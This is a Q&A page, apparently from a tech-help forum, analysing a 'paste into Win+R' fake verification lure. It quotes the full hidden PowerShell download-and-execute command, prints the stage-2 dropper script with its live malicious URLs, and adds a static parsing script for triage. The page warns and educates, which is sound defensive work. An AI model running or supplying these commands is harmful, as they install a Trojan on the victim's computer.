Tags: windows, powershell, cmd, trojan

What does this command prompt input do?


This is the input:

cmd.exe /c powershell -WindowStyle Hidden -Command "$rQd='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt'; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;"

This was on my clipboard after clicking a "human verification" button on some video download webapp. It told me that, in order to verify, I must hit Win + R, Ctrl + V, then Enter.

Thankfully, I already know what Win + R does, so I didn't follow those "verification instructions."

It looks like it downloads something, but I'm not sure what else.


Solution

  • To help you understand what the command is doing, and perhaps to help future readers with a similar issue: this is indeed downloading and executing a Trojan.

    In simple steps, here is how you can determine this. First, check the URL content with Invoke-RestMethod:

    Invoke-RestMethod https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt
    

    You will see that the content is a PowerShell script. Immediately after, you can see the suspicious run.zip at the top of the script; if you paste the .zip URL into https://www.virustotal.com/ you can see that it is indeed malicious:

    [screenshot: VirusTotal result for run.zip]

    Adding comments to understand what the code does:

    # defines download file
    $zxty = 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.zip'
    # defines destination file for the zip
    $qbrw = "$env:APPDATA\file_azlm5.zip"
    # defines destination folder for the zip
    $lpmk = "$env:APPDATA\Install_4278"
    # defines destination path for the extracted `.exe` from this zip
    $vkdy = Join-Path $lpmk 'spPortableRun.exe'
    
    # if the destination folder doesn't exist
    if (!(Test-Path $lpmk)) {
        # creates it
        New-Item -Path $lpmk -ItemType Directory
    }
    
    try {
        # tries to download `run.zip` to destination file `file_azlm5.zip`
        $ghwd = New-Object System.Net.WebClient
        $ghwd.DownloadFile($zxty, $qbrw)
    }
    catch {
        exit
    }
    
    try {
        Add-Type -AssemblyName 'System.IO.Compression.FileSystem'
        # extract the downloaded zip to destination folder `Install_4278`
        [System.IO.Compression.ZipFile]::ExtractToDirectory($qbrw, $lpmk)
        # and delete the zip file
        Remove-Item $qbrw -Force
    }
    catch {
        exit
    }
    
    try {
        # starts the trojan extracted from the zip file
        # (should've been `spPortableRun.exe` in `Install_4278` folder)
        Start-Process -FilePath $vkdy -WindowStyle Hidden
    }
    catch {
        exit
    }
    

    And to summarize with comments, the -Command you would be executing:

    # defines content URL
    $rQd = 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt'
    # creates a WebClient object
    $pLs = New-Object System.Net.WebClient
    # download the string content
    # (this is pretty much like using `Invoke-RestMethod`)
    $sLf = $pLs.DownloadString($rQd)
    # `Invoke-Expression` here invokes the PowerShell script
    # embedded in the string content 
    Invoke-Expression $sLf
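
The answer above works out what the lure does by reading the two stages by hand. As an added example (not part of the original question or answer, and not code from the page's author), the PowerShell script below does the same triage with PowerShell's own parser: it builds the syntax tree of each stage and lists the cmdlets invoked, the .NET methods called, the URLs and file paths in string literals, and the patterns that mark it as a downloader. The stage-1 `-Command` string and the stage-2 `run.txt` content are copied from the page into here-strings so the script runs offline; nothing is downloaded and none of the lure's code is executed. The indicator regexes and the wording of the flags are my own choices, not anything from the page.

```powershell
# Added example: static triage of a "paste this into Win+R" PowerShell lure.
# Both stages are parsed with [System.Management.Automation.Language.Parser];
# no network access, no Invoke-Expression, nothing from the lure is run.

# Stage 1: the exact -Command string the lure wants pasted into Win+R (copied from the page).
$stage1 = @'
$rQd='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt'; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;
'@

# Stage 2: the run.txt content as shown in the answer (copied here so the example runs offline).
# In real triage, fetch it with Invoke-WebRequest -OutFile into a scratch file and parse that file.
$stage2 = @'
$zxty = 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.zip'
$qbrw = "$env:APPDATA\file_azlm5.zip"
$lpmk = "$env:APPDATA\Install_4278"
$vkdy = Join-Path $lpmk 'spPortableRun.exe'
if (!(Test-Path $lpmk)) { New-Item -Path $lpmk -ItemType Directory }
try { $ghwd = New-Object System.Net.WebClient; $ghwd.DownloadFile($zxty, $qbrw) } catch { exit }
try {
    Add-Type -AssemblyName 'System.IO.Compression.FileSystem'
    [System.IO.Compression.ZipFile]::ExtractToDirectory($qbrw, $lpmk)
    Remove-Item $qbrw -Force
} catch { exit }
try { Start-Process -FilePath $vkdy -WindowStyle Hidden } catch { exit }
'@

function Get-ScriptIndicators {
    param(
        [Parameter(Mandatory)][string]$Script,
        [string]$Label = 'script'
    )

    # Parse only: this never evaluates the script text.
    $tokens = $null; $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseInput($Script, [ref]$tokens, [ref]$errors)

    # Cmdlets, functions and aliases invoked (Invoke-Expression, New-Object, Start-Process, ...).
    $commands = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.CommandAst] }, $true) |
        ForEach-Object { $_.GetCommandName() } | Where-Object { $_ } | Sort-Object -Unique

    # .NET instance/static methods called (DownloadString, DownloadFile, ExtractToDirectory, ...).
    $methods = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.InvokeMemberExpressionAst] }, $true) |
        ForEach-Object { $_.Member.Extent.Text } | Sort-Object -Unique

    # String literals, single-quoted and double-quoted (kept unexpanded), where URLs and paths live.
    $strings = $ast.FindAll({
            $args[0] -is [System.Management.Automation.Language.StringConstantExpressionAst] -or
            $args[0] -is [System.Management.Automation.Language.ExpandableStringExpressionAst] }, $true) |
        ForEach-Object { $_.Value } | Sort-Object -Unique
    $urls  = @($strings | Where-Object { $_ -match '^https?://' })
    $paths = @($strings | Where-Object { $_ -notmatch '^https?://' -and $_ -match '\\|\.(exe|zip|dll|ps1|bat|cmd)$' })

    # Any -WindowStyle parameter (the lure uses it to keep the dropped binary invisible).
    $hidesWindow = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.CommandParameterAst] -and
                                  $args[0].ParameterName -like 'WindowStyle*' }, $true).Count -gt 0

    # Heuristic flags (my own wording); iex is the built-in alias for Invoke-Expression.
    $flags = @()
    if ($commands -contains 'Invoke-Expression' -or $commands -contains 'iex') { $flags += 'executes downloaded text (Invoke-Expression)' }
    if ($methods  -contains 'DownloadString')      { $flags += 'fetches remote code into memory (WebClient.DownloadString)' }
    if ($methods  -contains 'DownloadFile')        { $flags += 'drops a file from the internet (WebClient.DownloadFile)' }
    if ($methods  -contains 'ExtractToDirectory')  { $flags += 'unpacks an archive (ZipFile.ExtractToDirectory)' }
    if ($commands -contains 'Start-Process')       { $flags += 'launches a program (Start-Process)' }
    if ($hidesWindow)                              { $flags += 'hides its window (-WindowStyle Hidden)' }

    [pscustomobject]@{
        Label       = $Label
        ParseErrors = $errors.Count
        Commands    = $commands
        Methods     = $methods
        Urls        = $urls
        Paths       = $paths
        Flags       = $flags
    }
}

Get-ScriptIndicators -Script $stage1 -Label 'stage 1 (Win+R -Command)' | Format-List
Get-ScriptIndicators -Script $stage2 -Label 'stage 2 (run.txt)'        | Format-List
```

Because the parser never evaluates anything, this is safe to run on the raw clipboard text of a lure like this one; to extend it to a live sample, fetch the stage-2 URL with `Invoke-WebRequest -OutFile` and pass `Get-Content -Raw` of that file as `-Script`, rather than ever replacing `Invoke-Expression` with something that still runs the text.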